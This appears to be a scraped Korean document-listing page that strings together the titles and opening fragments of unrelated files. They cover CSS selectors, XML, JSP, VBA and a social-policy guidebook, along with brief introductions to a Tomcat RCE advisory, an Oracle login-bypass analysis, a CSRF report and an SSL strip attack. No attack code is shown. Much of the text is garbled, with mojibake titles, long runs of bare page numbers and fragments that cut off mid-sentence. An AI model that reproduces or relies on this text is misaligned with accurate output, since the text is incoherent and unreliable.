PowerPoint 프레젠테이션 05 장 CSS3 선택자 1. 선택자개요 2. 기본선택자 3. 속성선택자 4. 후손선택자와자손선택자 5. 반응 / 상태 / 구조선택자 CSS 블록을생성할수있다. 선택자를이해하고적절한선택자를활용할수있다. 1 선택자개요 CSS3 선택자 특정한 HTML 태그를선택할때사용하는기능 선택한태그에원하는스타일이나스크립트적용가능 그림 5-1 CSS 블록 CSS 블록 style

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 How to produce ChemML and MathML 조윤상 ( 과편협기획운영위원 ) 1 Applications of XML Applications of XML RDF (Resource Description Framework) : 자원의정보를표현하기위한규격, 구문및구조에대한공통적인규칙을지원. RSS (Rich Site Summary) : 뉴스나블로그사이트에서주로사용하는콘텐츠표현방식.

More information

Ext JS À¥¾ÖÇø®ÄÉÀ̼ǰ³¹ß-³¹Àå.PDF

Ext JS À¥¾ÖÇø®ÄÉÀ̼ǰ³¹ß-³¹Àå.PDF CHAPTER 2 (interaction) Ext JS., HTML, onready, MessageBox get.. Ext JS HTML CSS Ext JS.1. Ext JS. Ext.Msg: : Ext Ext.get: DOM 22 CHAPTER 2 (config). Ext JS.... var test = new TestFunction( 'three', 'fixed',

More information

Microsoft PowerPoint - e pptx

Microsoft PowerPoint - e pptx Import/Export Data Using VBA Objectives Referencing Excel Cells in VBA Importing Data from Excel to VBA Using VBA to Modify Contents of Cells 새서브프로시저작성하기 프로시저실행하고결과확인하기 VBA 코드이해하기 Referencing Excel Cells

More information

Data Provisioning Services for mobile clients

Data Provisioning Services for mobile clients 9 장. 요청흐름제어와모듈화 1. 액션태그를이용한흐름제어 액션태그 하나의 JSP 페이지에서다른 JSP 페이지로요청처리를전달할때사용 중요사항 from.jsp 가아닌 to.jsp 가생성한응답결과가웹브라우저에전달된다. from.jsp 에서사용한 request, response 기본객체가 to.jsp 에그대로전달된다.

More information

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W

Research & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments

More information

untitled

untitled Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임

More information

양성내지b72뼈訪?303逞

양성내지b72뼈訪?303逞 Contents 성매매 예방교육 가이드북 Contents 제3부 성매매의 어제와 오늘 그리고 한국의 현주소 제4부 처벌 과 보호 의 성매매방지법 1. 성매매의 역사적 배경 및 추이 1. 성매매방지법 제정 배경 62 2. 성매매방지법 제정 취지 63 40 2. 성매매에 대한 국가별 개입 양상 42 3. 규범적 판단과 형사처벌을 기준으로 본 성매매 4. 외국의

More information

0204..........1..

0204..........1.. contents contents 01 6 7 8 02 9 10 11 12 13 03 14 15 16 17 18 19 20 21 22 23 24 25 26 27 01 30 31 32 33 34 35 36 37 02 38 39 40 41 42 43 44 45 46 03 47 48 49 50 51 52 53 54 55 56 04 57 58 59 60 61

More information

..........-....33

..........-....33 04 06 12 14 16 18 20 22 24 26 Contents 34 38 42 46 50 54 58 62 66 70 74 78 84 88 90 92 94 96 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 01 26 27 02 28 29 30 31 32 33 34 35 36 37 38 39

More information

자식농사웹완

자식농사웹완 윤 영 선 _ 지음 은혜한의원 서울시 마포구 도화1동 550 삼성프라자 308호 Tel : 3272.0120, 702.0120 진료시간 : 오전 9시 30분`~`오후 7시 점심시간 : 오후 1시`~`2시 토 요 일 : 오전 9시 30분`~`오후 3시 (일, 공휴일 휴진`/`전화로 진료 예약 받습니다) 은 혜 한 의 원 은혜한의원 CONTENTS 02 04 07

More information

chungo_story_2013.pdf

chungo_story_2013.pdf Contents 3 5 7 9 11 13 15 17 19 21 23 25 27 29 31 33 35 37 39 41 43 45 47 49 51 53 55 57 59 61 63 65 67 69 71 73 75 77 79 81 83 85 87 89 91 93 95 97 99

More information

Contents 12 13 15 17 70 79 103 107 20 21 24 29 128 137 141 32 34 36 41 46 47 53 55 174 189 230 240 58 61 64 1. 1. 1 2 3 4 2. 2. 2 1 3 4 3. 3. 1 2 3 4 4. 4. 1 2 3 4 5. 5. 1 2 3 1 2 3

More information

http://www.forest.go.kr 5 2013~2017 Contents 07 08 10 19 20 30 33 34 38 39 40 44 45 47 49 51 52 53 53 57 63 67 Contents 72 75 76 77 77 82 88 93 95 96 97 97 103 109 115 121 123 124 125 125 129 132 137

More information

전반부-pdf

전반부-pdf Contents 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72

More information

<4D6963726F736F667420506F776572506F696E74202D20312E20B0E6C1A6C0FCB8C15F3136B3E2C7CFB9DDB1E25F325FC6ED28C0BA292E70707478>

<4D6963726F736F667420506F776572506F696E74202D20312E20B0E6C1A6C0FCB8C15F3136B3E2C7CFB9DDB1E25F325FC6ED28C0BA292E70707478> Contents 3 2016 4 2016 5 2016 6 2016 7 2016 8 2016 9 2016 10 2016 11 2016 12 2016 13 2016 14 2016 15 2016 16 2016 17 2016 18 2016 19 2016 20 2016 21 2016 22 2016 23 2016 24 2016 25 2016 26 2016 27 2016

More information

..........- ........

..........- ........ Contents 24 28 32 34 36 38 40 42 44 46 50 52 54 56 58 60 61 62 64 66 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 01 02 24 25 03 04 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40

More information

Contents 007 008 016 125 126 130 019 022 027 029 047 048 135 136 139 143 145 150 058 155 073 074 078 158 163 171 182 089 195 090 100 199 116 121 01 01 02 03 04 05 06 8 9 01 02 03 04 05 06 10 11 01 02 03

More information

A°ø¸ðÀü ³»Áö1-¼öÁ¤

A°ø¸ðÀü ³»Áö1-¼öÁ¤ 1 4 5 6 7 8 9 10 11 Contents 017 035 051 067 081 093 107 123 139 151 165 177 189 209 219 233 243 255 271 287 299 313 327 337 349 12 13 017 18 19 20 21 22 23 24 25 26 27 28 29 30 31 035 051 067 081 093

More information

±¹³»°æÁ¦ º¹»ç1

±¹³»°æÁ¦ º¹»ç1 Contents 2 2002. 1 116 2002. 1 2002. 1 117 118 2002. 1 2002. 1 119 120 2002. 1 2002. 1 121 122 2002. 1 2002. 1 123 124 2002. 1 2002. 1 125 126 2002. 1 2002. 1 127 128 2002. 1 2002. 1 129 130 2002. 1 2002.

More information

¿¡³ÊÁö ÀÚ¿ø-Âü°í ³»Áö.PDF

¿¡³ÊÁö ÀÚ¿ø-Âü°í ³»Áö.PDF Contents 01 02 03 6 04 05 7 8 9 01 10 02 03 11 04 01 12 02 13 03 04 14 01 02 03 04 15 05 06 16 07 17 08 18 01 02 03 19 04 20 05 21 06 07 22 08 23 24 25 26 27 28 29 30 31 32 33 01 36 02 03 37 38 01

More information

전반부-pdf

전반부-pdf Contents 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72

More information

Microsoft PowerPoint - 3. 2016 하반기 크레딧 전망_V3.pptx

Microsoft PowerPoint - 3. 2016 하반기 크레딧 전망_V3.pptx Contents 3 2016 4 2016 5 2016 6 2016 7 2016 8 2016 9 2016 10 2016 11 2016 12 2016 13 2016 14 2016 15 2016 16 2016 17 2016 18 2016 19 2016 20 2016 21 2016 22 2016 23 2016 24 2016 25 2016 26 2016 27 2016

More information

³»Áöc03âš

³»Áöc03âš 08 09 27 20 32 42 contents 3 4 5 6 7 8 9 28 10 11 42 38 12 13 45 48 44 14 15 53 50 16 17 58 54 18 19 20 21 22 23 24 25 2008. 5. 27~30 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 2008. 4. 27 42 43 44

More information

¾ç¼º-¾÷¹«Æí¶÷-³»¿ëÃà¼Ò4

¾ç¼º-¾÷¹«Æí¶÷-³»¿ëÃà¼Ò4 contents 6 9 18 21 23 43 44 53 61 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62

More information

전도대회자료집

전도대회자료집 1 Contents 8 10 57 4 2 63 6 17 43 12 3 4 5 7 6 7 6 8 9 10 11 12 13 14 15 16 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60

More information

µ¶ÀÏÅëÀÏÁý1~2Æíq36£02Ð

µ¶ÀÏÅëÀÏÁý1~2Æíq36£02Ð CONTENTS 3 9 16 20 24 29 33 36 40 48 50 56 60 64 71 76 80 83 88 91 94 97 100 103 106 109 114 116 128 133 139 144 148 151 154 159 170 173 176 181 183 188 190 192 194 198 202 209 212 218 221 228 231 233

More information

Microsoft Word - 제로보드 XE_CSRF증명.doc

Microsoft Word - 제로보드 XE_CSRF증명.doc 제로보드 XE - CSRF 취약점증명 작성자 : eits1st 작성날짜 : 09년 3월 16일 목 차 1. 개요 1) CSRF의정의 2) 제로보드 XE 3) CSRF 테스트환경 2. 취약점증명 1) 권한상승시웹서버로전송되는 Request( 요청 ) 구문확인및추출 2) 확인된 Request( 요청 ) 구문을 AJAX(httpxml) 코드로작성 3) AJAX(httpxml)

More information

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com Content 1. SSL Strip - SSL? - SSL MITM - SSL Strip 2. SSL Strip 공격 3. 대응방법 Copyright@2012 All Rights Reserved by SemiDntmd 2 1. SSL Strip 1-1

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port

More information

Javascript

Javascript 1. 이벤트와이벤트핸들러의이해 이벤트 (Event) 는웹브라우저에서발생하는다양한사건을말합니다. 예를들면, 버튼을마우스로을했다거나브라우저를닫았다거나 Enter 키를눌렀다거나등등아주다양한사건들이있습니다. 그렇다면이벤트핸들러 (Event Handler) 는무엇일까요? 이다양한이벤트들을핸들링 ( 처리 ) 해주는것입니다. 예를들면, 어떤버튼을했을때메시지창이뜨게하는등을말합니다.

More information

Business Agility () Dynamic ebusiness, RTE (Real-Time Enterprise) IT Web Services c c WE-SDS (Web Services Enabled SDS) SDS SDS Service-riented Architecture Web Services ( ) ( ) ( ) / c IT / Service- Service-

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 ONE page html 이란? 원페이지는최근의홈페이지제작트렌드로한페이지에상단에서하단으로의마우스스크롤링을통해서컨텐츠를보여주는스타일의홈페이지입니다. USER 의시선을분산시키지않고위쪽에서아래쪽으로마우스스크롤링을통해서홈페이지의컨텐츠를보여주게됩니다. 반응형으로제작되어스마트폰, 아이패드, 태블릿,PC, 노트북등다양한디바이스에서자동으로최적화됩니다. ONE page 웹사이트사례

More information

160322_ADOP 상품 소개서_1.0

160322_ADOP 상품 소개서_1.0 상품 소개서 March, 2016 INTRODUCTION WHO WE ARE WHAT WE DO ADOP PRODUCTS : PLATON SEO SOULTION ( ) OUT-STREAM - FOR MOBILE ADOP MARKET ( ) 2. ADOP PRODUCTS WHO WE ARE ADOP,. 2. ADOP PRODUCTS WHAT WE DO ADOP,.

More information

354-437-4..

354-437-4.. 357 358 4.3% 5.1% 8.2% 6.2% 5.6% 6% 5% 5.3% 96.1% 85.2% 39.6% 50.8% 82.7% 86.7% 28.2% 8.0% 60.0% 60.4% 18,287 16,601 (%) 100 90 80 70 60 50 40 86.6% 80.0% 77.8% 57.6% 89.7% 78.4% 82.1% 59.0% 91.7% 91.4%

More information

Microsoft PowerPoint - web-part02-ch15-문서객체조작.pptx

Microsoft PowerPoint - web-part02-ch15-문서객체조작.pptx 과목명 : 웹프로그래밍응용교재 : 모던웹을위한 JavaScript Jquery 입문, 한빛미디어 Part2. jquery Ch15. 문서객체조작 2014년 1학기 Professor Seung-Hoon Choi 15 문서객체조작 문서객체조작 자바스크립트만으로문서객체모델을다루려면복잡함 jquery를이용하면쉽게다룰수있다. 이책에서가장중요한부분 15.1 문서객체의클래스속성추가

More information